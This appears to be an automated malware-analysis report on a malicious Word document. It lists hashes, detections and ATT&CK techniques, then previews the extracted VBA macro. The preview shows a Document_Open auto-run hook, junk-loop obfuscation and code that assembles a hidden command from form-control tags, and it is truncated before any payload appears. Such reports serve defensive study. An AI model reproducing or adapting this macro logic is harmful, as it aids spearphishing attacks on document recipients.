Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 90a3beebaa085403…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 246.3 KB
Created: 2020-01-16 15:19:00
Authoring application: Microsoft Office Word
First seen: 2020-08-10

MD5: 6f13a4a78993056b87be994625d942d2
SHA-1: 6a96d8a5f790768f23ca364cff3f94e572896151
SHA-256: 90a3beebaa0854035394ebb503a93b46b7858f539ac30bd19e1af068fecee85f

Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file is a Microsoft Office document containing a VBA macro that runs automatically when the document is opened (Document_Open). The macro calls GetObject, and its compiled p-code stream carries execution tokens, indicating an attempt to run malicious code. The ClamAV detection 'Doc.Downloader.Generic' strongly suggests that its purpose is to download and execute a secondary payload. No specific malware family could be identified.

Heuristics (6)

  • ClamAV: Doc.Downloader.Generic-7542953-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Generic-7542953-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro: the code runs automatically when the document is opened
  • GetObject call [high] (OLE_VBA_GETOBJ)
    GetObject call in the macro source
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, and documents whose source extraction failed, where no visible source is available.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11375 bytes
SHA-256: 8a86308c7488d3a3487edcd188bd5f3ab1c438cbbd70d0fd2c22e27b6bfccfe3
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "Eqwsqawl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Tyqsnjabq
End Sub

Attribute VB_Name = "Cuzfalodaovlu"
Attribute VB_Base = "0{18D111D9-FD98-485D-B2D4-DB0E8E982DE9}{EFF2A754-DB18-4F25-B1B8-77BF9F6E9DC9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Fzhllwhpyp"
Function Xvbedlidaw()
   Do While Gprdphnrkdl = 900
            Do While Jpmwivpqqigw = 3 + 2
            Egftusedw = Chr(4)
            Mvgpzbpjcc = Sqr(9) + Sleawpglg
            Ilejrhqfszjva = CLng(Qhqmdflb)
            Pshnqbgdwy = Int(1 + 1)
            Rxclxafiperw = CDate(QKoWc)
            Uufswksacpjrc = 9 + Int(4)
            Loop
            Do While Rdlvvptk = 2 + 4
            Lvdslalor = CLng(Ydbucrvncf)
            Fyagadjbk = Int(1 + 4)
            Koohqoxdlr = 2 + Int(3)
            Ajbsyxwodnny = Chr(6)
            Uklhfbjtqf = Sqr(7) + Fyecnqmeax
            Ldnzhxapnf = CDate(QKoWc)
            Loop
Loop
Kkpnzqpy = ChrW(wdKeyP)
   Do While Wbwyehqsb = 900
            Do While Wygnceswwqgl = 3 + 2
            Cesyisgd = Chr(4)
            Oiuolcxo = Sqr(9) + Xtmvquxbyoqqi
            Dxutelti = CLng(Ukelutrqofjsx)
            Ufeblyzzmhe = Int(1 + 1)
            Rmdkiwwktpeu = CDate(QKoWc)
            Uoslzmfjgpgra = 9 + Int(4)
            Loop
            Do While Sdprvzcbzj = 2 + 4
            Dbpzhnyfku = CLng(Pqhfodqvb)
            Lodcarnt = Int(1 + 4)
            Bbhrpzecpayhl = 2 + Int(3)
            Rxnvtgjdb = Chr(6)
            Ekxnxbvgno = Sqr(7) + Yelsmzbedbx
            Zxhrsxgnevue = CDate(QKoWc)
            Loop
Loop
Vfdlkdakfcaq = Kkpnzqpy + Cuzfalodaovlu.Zeyjdarrlbsv + Cuzfalodaovlu.Auxjplcuki
   Do While Lkypjxbqkujuh = 900
            Do While Rxjeilmj = 3 + 2
            Csatwkes = Chr(4)
            Yvshbkskkzv = Sqr(9) + Fvaegrmyb
            Gfbxnjfbfed = CLng(Bdxsbznh)
            Uxwgybppxjf = Int(1 + 1)
            Juxattrbbzvdc = CDate(QKoWc)
            Wbxfbsgzqdha = 9 + Int(4)
            Loop
            Do While Gmyzhoxeyto = 2 + 4
            Tybdvhwsvl = CLng(Ddvgxmsblvnxd)
            Vscdrofnb = Int(1 + 4)
            Mtuxlaxadkcxb = 2 + Int(3)
            Maxkdazbazshj = Chr(6)
            Qurxzyhoknzds = Sqr(7) + Ubwvbfpqlzmr
            Ssoofuigeiwel = CDate(QKoWc)
            Loop
Loop
Fack = Cuzfalodaovlu.Qnwuylavk.Tag
Vglylxixtexlb = Split(Vfdlkdakfcaq + LTrim(LTrim(Fack)), "9_msnnj883hn///")
   Do While Ifzfpotjepch = 900
            Do While Routdjlupw = 3 + 2
            Hyvaqcdehhy = Chr(4)
            Idzrmvifatlmm = Sqr(9) + Hopdyahuo
            Zeedkqaxugmcd = CLng(Jhekodswwsruv)
            Ilmnweaw = Int(1 + 1)
            Lppavlmdarzq = CDate(QKoWc)
            Uhiiktvfcsy = 9 + Int(4)
            Loop
            Do While Petikwpcocv = 2 + 4
            Erudcshwt = CLng(Smpzgmxcuvwzh)
            Uongemhdodl = Int(1 + 4)
            Futwpxqygpw = 2 + Int(3)
            Thlirnuny = Chr(6)
            Mkjljbvung = Sqr(7) + Czkjsqnyreytz
            Lyedhbkje = CDate(QKoWc)
            Loop
Loop
Xvbedlidaw = Jydxcoaz + Join(Vglylxixtexlb, "") + Jydxcoaz
   Do While Hxrpznmw = 900
            Do While Xulmenjp = 3 + 2
            Knkutqlh = Chr(4)
            Nnebxxqt = Sqr(9) + Pmvsfuqeh
            Urdrtmxvic = CLng(Sqjpjpgxpwam)
            Spzahaxrswbj = Int(1 + 1)
            Txkbktccve = CDate(QKoWc)
            Ajtxqrtbuiw = 9 + Int(4)
            Loop
            Do While Evbxmozlvdrm = 2 + 4
            Epptvtsz = CLng(Ugjqcqkbcgfyb)
            Phcefclrpp = Int(1 + 4)
            Oboceidcg = 2 + Int(3)
            Jetqjsvgol = Chr(6)
            Lpuiviot
... (truncated)